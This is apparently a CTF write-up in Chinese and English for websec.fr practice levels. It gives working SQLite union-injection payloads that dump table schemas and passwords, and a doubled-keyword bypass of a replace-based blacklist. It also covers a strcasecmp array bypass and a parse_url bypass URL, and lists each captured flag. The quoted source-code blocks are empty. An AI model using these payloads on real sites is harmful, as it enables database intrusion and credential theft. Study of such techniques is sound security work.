
网鼎杯比赛找来的练习题
level 01
sqlite注入:
有sqlite_master这个总表,name和sql字段包含了其他表信息
input:
1 and 1=0 union select 1,(select name from sqlite_master)--+
GOT : users
input:
1 and 1=0 union select 1,(select sql from sqlite_master)--+
GOT :
CREATE TABLE users(id int(7), username varchar(255), password varchar(255))
input:
1 and 1=0 union select 1,(select group_concat(password) from users)--+
GOT : WEBSEC{Simple_SQLite_Injection}
level 02
sqlite injection bypass
preg_replaceforunion, order, select, from, group, by
eg. select-> but selselectect->select
input :
1 and 1=0 ununionion seselectlect 1,(seselectlect grgroupoup_concat(password) frofromm users)--+
GOT : WEBSEC{BecauseBlacklistsAreOftenAgoodIdea}
level 03
level 17
1 |
|
Actually,it’s just a strcasecmp bypass trick,like strcmp.So we Post an array and get flag.
GOT:WEBSEC{It_seems_that_php_could_use_a_stricter_typing_system}.
level 25
source code:
1 |
|
If we make parse_url($_SERVER['REQUEST_URI']) = null,we will by pass the function.
So.We use:
http://websec.fr/level25/index.php?a=a:123/index.php&page=flag

Got:WEBSEC{How_am_I_supposed_to_parse_uri_when_everything_is_so_broooken}




近期评论